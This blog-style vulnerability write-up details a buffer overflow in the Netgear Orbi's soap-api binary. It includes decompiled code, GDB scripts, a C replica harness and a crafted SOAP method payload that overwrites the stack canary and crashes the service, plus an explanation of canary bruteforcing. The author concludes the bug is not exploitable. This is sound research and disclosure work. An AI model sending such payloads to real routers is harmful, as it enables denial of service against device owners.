      The main function that actually does handling of the various SOAP actions and methods
      Handles authentication checks
      Calls appropriate functions/etc based on submitted actions / method
      at the end of pretty much every case, it calls SendSoapRespCode(), passing the soap_action and soap_method pointers as arguments
    
  
  SendSoapRespCode()
    
      Constructs a portion of the HTTP response one of two ways depending on whether the SOAP method was Authenticate or not
      The HTML/XML blob is then passed on to SendSoapResponse() along with the SOAPAction header value
    
  
  SendSoapResponse()
    
      Here the final response content is finalized and sent to the client
    
  


live debugging

At this point I felt pretty confident I was crashing soap-api from this buffer overflow, so I was eager to see whether this bug would be exploitable. The stack traces I was seeing didn’t contain anything that immediately stood out as fishy (0x41s in registers, etc), so I wanted to do some live debugging on the device to validate my theory and poke around in memory. Since I had been unable to build a functional emulation environment where I could run soap-api, I would have to debug on bare metal. I used a static GDB for armhf downloaded from here: https://github.com/therealsaumil/static-arm-bins and copied it over to the Orbi.

For each request that accesses SOAP functionality,  lighttpd forks and (something) eventually executes soap-api to handle this request. I initially had some trouble getting the debugger to catch when soap-api was spawned and stay attached while other forks were created in the background, but eventually found a sequence of gdb commands that allowed me to catch soap-api early and then tell gdb to stay attached.

These were:


  create break on main()
  set follow-fork-mode child
  continue
  after sending a request, lighttpd forks and gdb attaches to soap-api and breaks on main()
  set follow-fork-mode parent (to prevent new forks from taking over)
  continue


This was enough to allow GDB to stay attached to the process up until the SIGSEGV, though there were still other issues that broke backtraces and the lack of debug symbols only made this harder. To avoid having to go through this sequence manually each time, I wrote up a GDB script to set everything up and insert break points on sscanf() and to catch signal 11. Each time the sscanf breakpoint is hit we print a backtrace, frame info, registers, and the 10 words from the current stack pointer, and do the same on segfault.

set width 0
set height 0
set verbose off

set follow-fork-mode child
break main
commands 1
set follow-fork-mode parent
continue
end

break sscanf
commands 2
backtrace full
info frame
info registers
x/10x $sp
continue
end

catch signal 11
commands 3
bt full
i frame
i registers
end

continue


lolwut: a null dereference

With the debugging setup figured out, I attached GDB to the lighttpd process, passed it the script, and then sent a request to trigger the bug — and then I got this:



This output seemed to indicate that:


  The crash was happening in strcmp in libc.so.1
  The crash was actually caused by a NULL dereference when the code attempted to access the address stored in register r0, which is 0 at the time of the crash


deep dive: SendSoapResponse()

At this point, I was pretty confused. The condition for the crash was definitely tied to the length of the SOAP method and there’s definitely a buffer overflow, but that wasn’t what was causing the crash. I tried different payload lengths and values to see if it caused anything other than a null pointer deref but was unsuccessful. This is when I decided it was time to go back to Ghidra and go through the code line-by-line to try to understand what was happening.

how the payload reaches SendSoapResponse()

The SOAP action and method strings are initially parsed from the SOAPAction HTTP header in main() and these are passed in as arguments to other functions that use them. By the time execution reaches SendSoapResponse(), the method and action strings have been used to construct the SOAP response body by the calling function SendSoapRespCode(). The code snippet below shows how the SOAP body string is constructed:

  char resp_b[512];
  char *resp_fmt = "\"urn:NETGEAR-ROUTER:service:%s:1\">\r\n%03d\r\n";
  snprintf(resp_b, 512, resp_fmt, SOAP_METHOD, SOAP_ACTION, SOAP_METHOD, response_code);


Assuming a method “METHOD”, action “ACTION”, and response code 404, the resulting string would be:

 xmlns:m="urn:NETGEAR-ROUTER:service:ACTION:1">
404


snprintf() will write at most 512 bytes (including the terminating NUL byte), and that limit can already be reached while it is inserting the first format argument if that argument is long enough. When that happens, no further formatting takes place and the rest of the string is truncated. For example, submitting a method string containing 500 A’s results in the following string:




code breakdown

The code block below is the same as the one shown in the screenshot in the “first find” section earlier in this post but with annotations and renamed variables from after having gone through it all and labeled everything.

Ghidra decompiler output:

/*1*/      if (is_soap_login == 1) {
/*2*/        local_jwt_ptr = (char *)cat_file("/tmp/jwt_local");
/*3*/       fprintf(stream,
/*4*/                "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nS erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\nSet-Cookie: jwt_local=%s\r\n\r\n"
/*5*/                ,total_content_len,local_jwt_ptr);
/*6*/      }
/*7*/      else {
/*8*/        fprintf(stream,
/*9*/                "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nS erver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n\r\n"
/*10*/                ,total_content_len);
/*11*/      }
/*12*/      soap_log(2,
/*13*/               "HTTP/1.0 200 OK\r\nContent-Length: %d\r\nContent-Type: text/xml; charset=\"UTF-8\"\r\nSe rver: Linux/2.6.15 uhttpd/1.0.0 soap/1.0\r\n"
/*14*/               ,total_content_len);
/*15*/      fputs(s_xml_version="1.0"_encoding="UT_000bd624,stream);
/*16*/      fputs(resp,stream);
/*17*/      fputs(s__
/*18*/      soap_log(0,"%s%s%s",s_1.0"_encoding="UT_000bd624,resp,
/*19*/               s_SOAP-ENV:Body>_SOAP-ENV:Enve_000bd6fc);
/*20*/      fflush(stream);

/*21*/      if ((ext_mode == 0) &&
/*22*/         (total_content_len = config_invmatch("installState",&DAT_0008d1a0), total_content_len != 0)) {
/*23*/                        /* OVERFLOW - method_response_buf is 64 bytes and sscanf does not check length
/*24*/                            */
/*25*/        sscanf(resp,",method_response_buf);
/*26*/        strstr_Response_ret = (char *)strstr_wrapper(method_response_buf,"Response");
/*27*/        if (strstr_Response_ret != (char *)0x0) {
/*28*/          *strstr_Response_ret = '\0';
/*29*/        }
/*30*/                        /* POSSIBLE NULL DEREF, strstr_wrapper might return null */
/*31*/        ptr_to_substrings_found = (char *)strstr_wrapper(resp,"service:");
/*32*/        sscanf(ptr_to_substrings_found,"service:%[^:]",service_action_buf);
/*33*/        ptr_to_substrings_found = (char *)strstr_wrapper(resp,"");
/*34*/        if (ptr_to_substrings_found != (char *)0x0) {
/*35*/          sscanf(ptr_to_substrings_found,"%[^<]",&local_114);
/*36*/        }
/*37*/        vsnprintf_wrap(combined_action_method_str,0x80,"%s:%s",service_action_buf,method_response_buf);
/*38*/        execve_wrapper_maybe
/*39*/                  ("/dev/console",0,3,"/usr/sbin/ra_installevent","soapresponse",
/*40*/                   combined_action_method_str,&local_114,0);
/*41*/        FUN_0001ae0c("ra_install","method=%s, code=%s",combined_action_method_str,&local_114);
/*42*/      }



  Arguments:
    
      FILE *stream: filestream where response will be written (socket back to client?)
      char *resp: a 512 byte buffer containing the body of the XML SOAP response constructed by the calling function (SendSoapRespCode)
    
  
  Lines 1-20 in the snippet handle constructing and sending the response content to the client by writing that content to the file stream passed in as the first argument to SendSoapResponse
    
      note: this is why the response is always sent, even when the process crashes afterwards
    
  
  Line 25: a call to sscanf to attempt to parse the SOAP method string
    
      other functions up the call stack have parsed and placed the method string into an XML component in the resp argument passed to SendSoapResponse
      sscanf searches for the pattern  and will parse the content between the colon up to the end of ‘Response’

      method_response_buf is a static 64 byte buffer
      it’s possible to overflow this buffer if the string between  and Response* is longer than 64 bytes, which appears to be achievable

    

  

  Line 26: a call to a strstr wrapper to check for the presence of the string “Response” in the data that was read into method_response_buf by sscanf
    
      this wrapper first checks to make sure neither of the two arguments passed to it are NULL
        
          if either of them are, it doesn’t call strstr and just returns a NULL pointer
          if they’re not, it calls strstr and then returns whatever strstr returned; strstr also returns NULL if the string is not found
        
      
      If the submitted SOAP method has pushed Response string entirely off of the XML buffer that is constructed, this would return NULL
    
  
  Lines 27-29: if the call to strstr did NOT return NULL (the Response string was found), overwrite the first character of Response with a NUL byte
    
      This NUL-terminates the string so that other functions, which stop reading at the NUL byte, only see the SOAP method part and the Response part is cut off
    
  
  Line 31: another call to strstr wrapper, this time checking the resp argument containing the XML constructed by the calling function for the string  "service:"
    
      there is no check after this to see if this returned NULL
    
  
  Line 32: second call to sscanf that attempts to parse the SOAP action string from the pattern "service:*:", this time using the value returned by the call to strstr on the previous line as its source
    
      since this value was not checked for NULL before this call to sscanf, this is likely the path taken to reach the crash condition
      this only happens when the method string was sufficiently long to have pushed "service:*:" string off of the XML body buffer resp
    
  
  Line 33: third call to the strstr wrapper, this time searching for the string "" in resp
  Lines 34-36: if the string was found by the call to strstr on the previous line, sscanf is used to parse out a substring similar to the previous calls; otherwise this is just skipped.
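
The NULL handling and the missing length check described above can be modeled in a few lines of Python. This is only a rough model under stated assumptions: `strstr_wrapper` and `scan_service` are stand-ins written for this sketch (not the decompiled functions), Python's `None` plays the role of NULL, and the destination buffer size is a parameter because the real size is only known approximately.

```python
def strstr_wrapper(haystack, needle):
    """Model of the wrapper: returns None (NULL) if either argument is None
    or the needle is not found, else the suffix starting at the match."""
    if haystack is None or needle is None:
        return None
    idx = haystack.find(needle)
    return None if idx < 0 else haystack[idx:]


def scan_service(src, buf_size):
    """Model of sscanf(src, "service:%[^:]", buf) with no field width.

    Returns (parsed, overflow_bytes). Raises ValueError when src is None,
    which is the Python stand-in for the NULL dereference."""
    if src is None:
        raise ValueError("NULL passed to sscanf (would crash on the device)")
    if not src.startswith("service:"):
        return "", 0
    parsed = src[len("service:"):].split(":", 1)[0]
    if not parsed:
        # %[^:] must match at least one character, otherwise nothing is written
        return "", 0
    # sscanf also writes a terminating NUL byte, hence the +1
    overflow = max(0, len(parsed) + 1 - buf_size)
    return parsed, overflow
```

Feeding the result of `strstr_wrapper` straight into `scan_service` without checking for `None` mirrors what happens on lines 31-32 of the decompiled code.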


takeaways

After going through the code, I knew the following:


  It is possible to overflow method_response_buf that the first call to sscanf() writes the method string to.
  It is possible to overflow service_action_buf that the second call to sscanf() writes the action string to.
  A NULL dereference will occur in the second call to sscanf if the string 'service:' is not found in resp.
    
      This will occur if the method string submitted is long enough to cause the SOAP action portion (service:) to be truncated from the final response data in resp
    
  


Knowing this, it was clear to see why the payloads I was sending were causing the null dereference: the method strings were sufficiently long to have caused the 'service:' string to be truncated from the end of resp, causing the strstr() call which checks for it to return a null pointer that is then passed to sscanf() without checking if it was null first.
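
The truncation effect can be reproduced with a small simulation. The XML template below is an assumption: it only mirrors the argument order (method, action, method, response code) and the `service:` fragment described earlier, not the exact string used by soap-api, and `build_resp` is a hypothetical name.

```python
# ASSUMPTION: the exact XML template is not known here; this one only mirrors
# the argument order (method, action, method, code) described in the post.
TEMPLATE = (
    '<m:{method}Response xmlns:m="urn:NETGEAR-ROUTER:service:{action}:1">\r\n'
    '</m:{method}Response>\r\n<ResponseCode>{code:03d}</ResponseCode>\r\n'
)


def build_resp(method, action, code, size=512):
    """Model of snprintf(buf, size, ...): at most size-1 characters are kept,
    the last byte being reserved for the terminating NUL."""
    full = TEMPLATE.format(method=method, action=action, code=code)
    return full[:size - 1]
```

With a short method the `service:` marker survives; with a method longer than the buffer, everything after the first inserted argument is cut off, so a later search for `service:` comes back empty.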

(failed) exploit attempt #1

The results of the code analysis indicated that in order to successfully trigger a crash caused by the buffer overflow, the following conditions would need to be met:


  the method string needs to be long enough for the overflow to be useful (i.e. overwriting the return address, base pointer, etc.)
  the final contents of resp must include the string 'service:'


With this in mind, I went back and spent some time trying payloads I thought would successfully avoid triggering the null dereference but was ultimately unsuccessful. My (incorrect) conclusion was that the conditions necessary to overwrite something important made it impossible to ensure the check for the service string would be passed. I had tried putting it both at the beginning and end of the payload string but this still caused the null deref every time. I had been looking at this bug for a few days at this point and was pretty exhausted, so I just called it and concluded that even though the buffer overflow was there, it was ‘unreachable’ due to the (incorrect) constraints I had in mind at the time. Honestly, I was just relieved to be done with it.

exploit viability, revisited

As hinted at above, I did eventually revisit the question of whether the buffer overflow could be triggered a few weeks later and found a way to do it! In fact, it actually happened while I was in the process of writing the first part of this post, where I was basically going to end with the section before this one, saying there was no way to get around it. While I was reading through my notes and trying to clean everything up and make sure it all made sense, I noticed I had made some mistakes and incorrect assumptions that had caused me to have an inaccurate understanding of the constraints. I’ve corrected those mistakes and cleaned things up in the code breakdown above in the interest of clarity, but basically I had an incorrect understanding of the constraints and the behavior of sscanf(). Anyway, I updated my mental model of the bug.

With a new understanding of the constraints, I went back to the code and did some more testing to see if it would be possible to overflow method_response_buf while avoiding the NULL dereference caused by failing the check for "service:". Assuming this can be done successfully, the program should then crash due to failing a stack canary check. Stack canary protection (as well as PIE and RELRO) was enabled between firmware versions 2.5.1.16 - 2.7.33.

From the GPL archive (soap-api is part of the net-cgi package):

./package/dni/net-cgi/Makefile:TARGET_CFLAGS += -Werror -Wl,-z,now -Wl,-z,relro -fPIE -pie -fstack-protector


local testing

In order to get a better understanding of the actual behavior of the application with a better debugging environment to work in, I wrote the following code to simulate the same behavior on my own system.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int replica (FILE *stream, char *resp) {
	// THE ORDER OF VARIABLES IN MEMORY IS IMPORTANT TO REPRODUCE ACCURATELY (or at least close to accurate)
	int content_len;
	char* jwt;
	char *var2;
	char *var3;
	char *var4;
	char method_buf[64];
	char action_buf[32];
	char combined_action_method[128];
	char *undef1;
	char *undef2;
	int stack_check_val;

	printf("resp: %s\n", resp);

	// fake stack canary
	stack_check_val = 0x313373;
	printf("[+] stack check start: 0x%x\n", stack_check_val);

	// null the buffers
	memset(method_buf, 0, 64);
	memset(action_buf, 0, 32);
	memset(combined_action_method, 0, 128);

	// call sscanf - 1: parse the Method portion from the xml blob in resp
	// and save it to method_buf; the overflow occurs
	// here if the parsed string is greater than 64 bytes
	printf("[+] sscanf call 1: parse method portion from resp\n");
	sscanf(resp, ", method_buf);

	// this would check to confirm that the expected pattern/str was parsed (should still
	// contain the 'Response' portion - a long enough method will cause this to be truncated and we'll
	// fail this check.
	var2 = strstr(method_buf, "Response");
	// but it doesn't really matter because it's only to see if
	if (var2 != (char *)0x0) {
		printf("[+] found 'Response' in method_buf, NULLED\n");
		*var2 = 0x0;
	}

	// ========= Second call to sscanf() and NULL check fail ===========
	// search for service string in resp, no NULL check
	// a long enough METHOD would result in this being truncated, causing strstr
	// to return a NULL pointer
	printf("[+] strstr call 1: check for 'service:' in resp\n");
	var3 = (char *)strstr(resp, "service:");
	// DEBUG -- show when we fail this check
	if (var3 == (char *)0x0) {
		printf("\033[0;31m[!] didn't find 'service:', expect a NULL ptr deref\n\033[0m");
		printf("resp: %s\n", resp);
	}
	printf("[+] sscanf call 2: parse ACTION portion from resp\n");
	sscanf(var3, "service:%[^:]", action_buf);

	// check for  in resp
	printf("[+] strstr call 2: check for '' in resp\n");
	var3 = (char *)strstr(resp, "");
	if (var3 != (char *)0x0) {
		// if its there, parse some stuff from it (not important right now)
		printf("[+] found , passed check\n");
		undef1 = 0;
	}

	// check if the stack check int was overwritten
	printf("[+] stack check end: 0x%x\n", stack_check_val);
	return 0;
}

int main(int argc, char *argv[]) {
	// args to pass to target func (replicating original)
	FILE *streams = 0;

	// this will hold the payload (i.e. the Method portion we would submit)
	// read from env to make testing easier
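	char *payload = getenv("PAYLOAD");
	if (payload == NULL) {
		// bail out early instead of passing NULL to strlen/snprintf
		fprintf(stderr, "[-] PAYLOAD env variable not set\n");
		return 1;
	}
	printf("[+] payload length: %zu\n", strlen(payload));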

	// construct the response content the same way the server does in SendSoapRespCode()
	char resp_b[512];
	memset(resp_b, 0, 512);
  // this is the fmt string the calling function uses to construct resp
	char *resp_fmt = "\"urn:NETGEAR-ROUTER:service:%s:1\">\r\n%03d\r\n";
	snprintf(resp_b, 512, resp_fmt, payload, "ConfigSync", payload, 404);

	// call the target function with the payload
	printf("[+] calling target function...\n\n");
	replica(streams, resp_b);
	return 0;
}


I experimented with various payloads using this code and this is when I made a new discovery: different payloads would cause resp to be corrupted in different ways, which would sometimes result in resp containing the ‘service:’ string before the first call to sscanf() but not after. The output below shows this happening with a payload that one would assume would definitely pass the string check:

-> % ./replica2
[+] payload length: 130
[+] calling target function...

resp: ="urn:NETGEAR-ROUTER:service:ConfigSync:1">
404

[+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] found 'Response' in method_buf, NULLED
[+] strstr call 1: check for 'service:' in resp
[!] didnt find 'service:', expect a NULL ptr deref
resp: e:
[+] sscanf call 2: parse ACTION portion from resp
[1]    221258 segmentation fault (core dumped)  ./replica2


After some trial and error I eventually found a payload that would successfully overflow method_buf, avoid the null deref, and overwrite the simulated stack canary:

-> % ./replica2
[+] payload length: 2450
[+] calling target function...

resp: [+] stack check start: 0x313373
[+] sscanf call 1: parse method portion from resp
[+] strstr call 1: check for 'service:' in resp
[+] sscanf call 2: parse ACTION portion from resp
[+] strstr call 2: check for '' in resp
[+] stack check end: 0x63697672
[1]    221814 segmentation fault (core dumped)  ./replica2


Nice!

now, against the device

With a new payload in hand, I moved back to testing this against the actual device while attached with GDB. After a bit of tweaking to account for differences in memory layout, I eventually noticed that this payload resulted in the process receiving a SIGKILL and dying rather than triggering the SIGSEGV caused by the null dereference.

"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaa"


I modified the GDB script I had been using to break on __stack_chk_fail() instead of sscanf() to confirm and saw this in the output:



Finally! The null dereference had been avoided and it was the stack canary check failing that was causing the application to die. After all the trouble I’d gone through digging into this bug, that felt goooooood.
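
The repeating structure of the payload above is easier to work with when it is generated programmatically. The sketch below is a hypothetical helper (`build_payload` is not from the original tooling); the number of repetitions and the tail are parameters because the right values depend on the memory layout of the target.

```python
# Building blocks copied from the payload shown above
PREFIX = "x:x:service:ConfigSync:5#AA"
PAIR = "service:AAAAAAA" + "service:aaaabaa"


def build_payload(pairs, tail=""):
    """Prefix, then `pairs` repetitions of the two-marker block, then an
    optional tail that ends up at the far end of the overflow."""
    return PREFIX + PAIR * pairs + tail
```

Varying `pairs` and ending with a recognizable tail (for example a run of B's) is one way to find which part of the payload lands on a given value.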

I spent a little more time playing with the payload until I found the exact place where the canary overwrite actually happened and trimmed it down to this:

"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:**BBBBBB**"


Thread 2.1 "soap-api" hit Breakpoint 3, 0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
r0             0x0	0
r1             0xb6f01b65	3069188965
r2             **0x42424242**	1111638594
r3             0x5719b01e	1461301278
r4             0x0	0
r5             0xb6a39214	3064173076
r6             0xb6f2bb80	3069361024
r7             0xbe88e4cc	3196642508
r8             0xbe88e40c	3196642316
r9             0xbe88e3cc	3196642252
r10            0xbe88e3a4	3196642212
r11            0xb6f316fc	3069384444
r12            0xb6f2bc6c	3069361260
sp             0xbe88e388	0xbe88e388
lr             0xb6eb2aa8	-1226102104
pc             0xb69aee40	0xb69aee40 <__stack_chk_fail>
cpsr           0x80000010	-2147483632
0x0:	
0xb6f01b65:	""
0x42424242:	
0x5719b01e:	


stack canary bypass, question mark?

So, after weeks (months?) of poking at this bug on and off and eventually giving up, I’d come back and managed to get back to square one: a buffer overflow that was triggering the stack check fail and crashing the application. Naturally, the next step was to explore ways to get past the stack canary and see if I could get a working exploit going. I’ve only ever dealt with stack canaries in toy examples so this would be my first time trying against a real target and having to do it with the limited debugging environment only made things more difficult.

a primer on SSP

The Stack Smashing Protector (SSP) is a compiler feature specifically designed to detect stack-based buffer overflows and abort the program if one is detected, to mitigate the potential effects of the memory corruption. There are various implementations of this feature, but they all follow a similar design: the compiler inserts code that copies a value from a global variable into a local variable (the canary) at the start of a function, and code to check that this value still matches the value saved in the global variable at the end of the function, before it returns. If the values do not match, the program is immediately terminated to prevent further execution that could result in undefined behavior. The canary is usually inserted into the stack in such a way that it sits immediately before the return address at the edge of the current function’s stack frame. This means a buffer overflow that has successfully corrupted the return address would have also corrupted the canary value, which would result in the canary check failing and the program being aborted before the function returns and attempts to use the corrupted return address.

For GCC’s -fstack-protector, for example:


  This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.



It’s important to note one thing: this protection does not prevent overflows from happening; it’s only meant to detect them and try to mitigate against classic stack overflow exploitation. This means that any code that executes after the overflow has occurred, but before the end of the function when the canary is checked, could be affected by the memory corruption. Modern implementations do a few things to mitigate against this as well, such as reordering variable declarations to move non-buffer variables ‘above’ overflow-able buffers so that they cannot be (easily) corrupted, and placing all buffers together in memory right before the canary and return address to limit the scope of data that can be corrupted and increase the likelihood of overflows overwriting the canary value.
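
The detect-but-not-prevent behavior can be illustrated with a toy model. This is a deliberately simplified sketch: the `Frame` class, its layout (buffer, then canary, then return address, with no saved frame pointer), and the address values are all made up for illustration and do not reflect the real soap-api stack frame.

```python
import struct

BUF_SIZE = 64


class Frame:
    """Toy stack frame laid out as [ buffer | canary | saved return address ]."""

    def __init__(self, guard, ret_addr=0x10434):
        self.guard = guard  # stand-in for the global guard value
        self.mem = bytearray(BUF_SIZE) + struct.pack("<II", guard, ret_addr)

    def unchecked_copy(self, data):
        # Like sscanf/strcpy without a width: writes past the buffer if data is long
        self.mem[:len(data)] = data

    def epilogue(self):
        # The check inserted by the compiler before the function returns
        canary, ret = struct.unpack_from("<II", self.mem, BUF_SIZE)
        if canary != self.guard:
            raise RuntimeError("stack smashing detected")  # __stack_chk_fail
        return ret
```

An overflow that rewrites the return address without knowing the guard value raises in `epilogue()`, while one that writes the correct guard value back in place goes undetected, which is why leaking or guessing the canary matters.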

Another important point is that the canary value is set once at process startup, so it remains the same for the entire lifetime of the application and is inherited by any children it forks. New processes started via the shell or execve() will have unique canaries.

I took a look at arch/arm/include/asm/stackprotector.h in the kernel sources for the kernel used by the device (custom fork of 3.14.77) and found this code, showing that the canary is initialized by XORing random bytes against the value of LINUX_VERSION_CODE on ARM architectures:

static __always_inline void boot_init_stack_canary(void)
{
	unsigned long canary;

	/* Try to get a semi random initial value. */
	get_random_bytes(&canary, sizeof(canary));
	canary ^= LINUX_VERSION_CODE;

	current->stack_canary = canary;
	__stack_chk_guard = current->stack_canary;
}
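
As a quick sanity check on what that XOR contributes, the sketch below reproduces the arithmetic outside the kernel. The function names are hypothetical, and it assumes a 32-bit `unsigned long` (as on this ARMv7 target) and the usual `KERNEL_VERSION(a, b, c)` packing of `(a << 16) + (b << 8) + c` used by 3.x kernels.

```c
#include <stdint.h>

/* Same packing as the kernel's KERNEL_VERSION() macro on 3.x kernels. */
uint32_t demo_kernel_version(uint32_t major, uint32_t minor, uint32_t patch)
{
    return (major << 16) + (minor << 8) + patch;
}

/* Mirrors `canary ^= LINUX_VERSION_CODE` for a caller-supplied random value. */
uint32_t demo_mix_canary(uint32_t random_value, uint32_t version_code)
{
    return random_value ^ version_code;
}
```

For 3.14.77 the version code works out to 0x030e4d. Since XOR with a known constant is reversible, the result is exactly as unpredictable as the random bytes that went in: knowing the kernel version does not help an attacker guess the canary.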


bruteforcing? I guess…not

Generally speaking, there are two ways of going about bypassing the canary check:


  Use a separate memory leak vulnerability to leak the canary value so that it can be correctly overwritten
  Bruteforce the canary byte-by-byte (only works under certain conditions)


Since I hadn’t found any way to leak memory, the only real option left was bruteforcing. There’s a specific bruteforcing technique that greatly reduces the total number of attempts needed to determine the canary value: guess one byte at a time, use the lack of a crash as an oracle to tell when the correct byte has been guessed, and repeat for each byte of the canary. As mentioned above, this only works under certain conditions: the program must keep the same canary between payloads (i.e. fork-and-accept servers) and the code that reads the payload must not append a NULL byte (e.g. read() / recv()). I found a few good resources that helped me better understand this concept, such as this LiveOverflow video and this CTF guide (screenshot below taken from here).
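
The byte-by-byte idea can be sketched as a small simulation. Nothing here talks to a real target: `demo_secret` stands in for the canary of a hypothetical forking server, and `demo_survives()` stands in for "send an overflow that overwrites the first n canary bytes and see whether the child crashes". All names are made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define DEMO_CANARY_LEN 4

/* Simulated target state: the secret canary and a request counter. */
static const uint8_t demo_secret[DEMO_CANARY_LEN] = { 0x9e, 0xd2, 0x10, 0xb7 };
static unsigned demo_attempts;

/* Oracle: 1 if overwriting the first n canary bytes with guess causes no crash. */
static int demo_survives(const uint8_t *guess, size_t n)
{
    demo_attempts++;
    return memcmp(guess, demo_secret, n) == 0;
}

/* Recovers the canary one byte at a time. Returns 0 on success, -1 on failure. */
int demo_bruteforce(uint8_t out[DEMO_CANARY_LEN])
{
    for (size_t i = 0; i < DEMO_CANARY_LEN; i++) {
        int found = 0;

        for (unsigned b = 0; b < 256; b++) {
            out[i] = (uint8_t)b;
            if (demo_survives(out, i + 1)) {  /* bytes 0..i-1 are already known */
                found = 1;
                break;
            }
        }
        if (!found)
            return -1;  /* the oracle never reported survival for this byte */
    }
    return 0;
}
```

The worst case is 4 × 256 = 1024 requests instead of 2^32, which is why both conditions matter: the oracle is only meaningful if the canary stays fixed between requests and if the overflow can stop exactly on a byte boundary without a terminator clobbering the next byte.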



Seems easy enough, right? I went back to the device and determined the minimum length to overflow the buffer and trigger the stack check fail was 209 characters. After sending only a couple of requests and watching the values in the debugger I quickly realized this wasn’t going to work at all.

The output below shows the debugger breaking at the start of __stack_chk_fail() with r2 containing the local copy of the stack canary that has been overwritten by a single byte and r3 containing the original. As you can see, the byte that was written was 00 (NULL): the function that reads the payload into the buffer (sscanf()) appends a NULL. So, one of the conditions for this to be viable is already out.

Thread 2.1 "soap-api" hit Breakpoint 2, 0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
No symbol table info available.
Backtrace stopped: Cannot access memory at address 0x4f532f34
Stack level 0, frame at 0xbecd34c8:
 pc = 0xb698be40 in __stack_chk_fail; saved pc = 0xb6e8faa8
 Outermost frame: Cannot access memory at address 0x4f532f34
 Arglist at 0xbecd34c8, args:
 Locals at 0xbecd34c8, Previous frame's sp is 0xbecd34c8
r0             0x0      0
r1             0xb6edeb65       3069045605
r2             0xb710d200       3071332864
r3             0xb710d29e       3071333022
r4             0x0      0
r5             0xb6a16214       3064029716
r6             0xb6f08b80       3069217664
r7             0xbecd360c       3201119756
r8             0xbecd354c       3201119564
r9             0xbecd350c       3201119500
r10            0xbecd34e4       3201119460
r11            0xb6f0e6fc       3069241084
r12            0xb6f08c6c       3069217900
sp             0xbecd34c8       0xbecd34c8
lr             0xb6e8faa8       -1226245464
pc             0xb698be40       0xb698be40 <__stack_chk_fail>
cpsr           0x80000010       -2147483632
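
The terminator behavior is easy to reproduce in isolation. The sketch below is not the soap-api code; the `%16s` format string, buffer sizes, and function names are assumptions chosen for illustration. It pre-fills a scratch region with 0xff and reports the byte found right after the copied data, once for `sscanf()` and once for `memcpy()`.

```c
#include <stdio.h>
#include <string.h>

#define DEMO_MAX 16

/*
 * Returns the byte found immediately after the data sscanf() stored.
 * input is assumed to contain no whitespace (%s stops at whitespace).
 */
unsigned char demo_byte_after_sscanf(const char *input)
{
    unsigned char region[DEMO_MAX + 1 + 8];
    size_t n = strlen(input);

    if (n > DEMO_MAX)
        n = DEMO_MAX;
    memset(region, 0xff, sizeof(region));   /* 0xff marks untouched bytes */
    if (sscanf(input, "%16s", (char *)region) != 1)
        return 0xff;                        /* nothing was stored */
    return region[n];
}

/* Same measurement for a raw copy, which adds no terminator. */
unsigned char demo_byte_after_memcpy(const char *input)
{
    unsigned char region[DEMO_MAX + 1 + 8];
    size_t n = strlen(input);

    if (n > DEMO_MAX)
        n = DEMO_MAX;
    memset(region, 0xff, sizeof(region));
    memcpy(region, input, n);
    return region[n];
}
```

With `sscanf()` the byte after the data is always 0x00, so an overflow that reaches the canary necessarily writes a NULL one byte further than the last attacker-controlled byte. With a raw copy the following byte is left alone, which is what the byte-by-byte technique depends on.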


Not only that, the canary value was changing between requests. In retrospect, this is obvious since soap-api is not forking itself to handle the requests, but is instead being execve’ed at some point after lighttpd forks.

So, yeah: (smarter) bruteforcing was out of the question. Since along the way I’d also learned that PIE and RELRO were enabled on the binary, I called it quits at this point. I feel pretty confident in saying this isn’t an exploitable issue.

conclusion

This turned out to be a long journey that gave me a chance to become more familiar with some of the internals of this system. It also forced me to get creative in finding ways to debug and test things out, which taught me some new tricks. In the end, I was able to definitively confirm the buffer overflow could be reached, but the mitigations in place combined with the nuances of the environment proved to be enough to thwart my exploitation attempts.

Alas, this is the life of security research — sometimes, even when you’ve found the bug, there’s still no guarantee you’ll be able to exploit it.

references


  Stack Canaries – Gingerly Sidestepping the Cage [2021]
  LiveOverflow video
  CTF guide on stack canaries
  Bruteforcing x86 Stack Canaries



orbi hunting 0x0: introduction, UART access, recon
2022-06-12T00:00:00+00:00
I’ve been hunting for bugs on the Netgear Orbi (RBR20) for about a year and a half now. This is the first in a series of posts where I’ll be publishing my notes and findings from this research. This post provides a high-level overview of the system and notes on getting serial console access via UART.

Introduction
I wanted to upgrade the WiFi at home a few years ago and ended up purchasing one of Netgear’s Orbi line of mesh WiFi routers. After about a year I ended up doing a ‘real’ upgrade to some Ubiquiti equipment, so I had this Orbi just lying around and decided to use it as a target for bug hunting. I’ve done a bit of research against IoT devices in the past and wanted something new to look into. I’ve now been hunting on this device for about a year and a half, walking away and coming back to it multiple times, and sometimes going months without doing anything with it. Over this time I’ve explored a few angles and documented quite a bit of it, so I thought I’d just start dumping some of this information here, mostly in the hopes that it may be useful to anyone else who may be interested in doing their own hunting on this device.



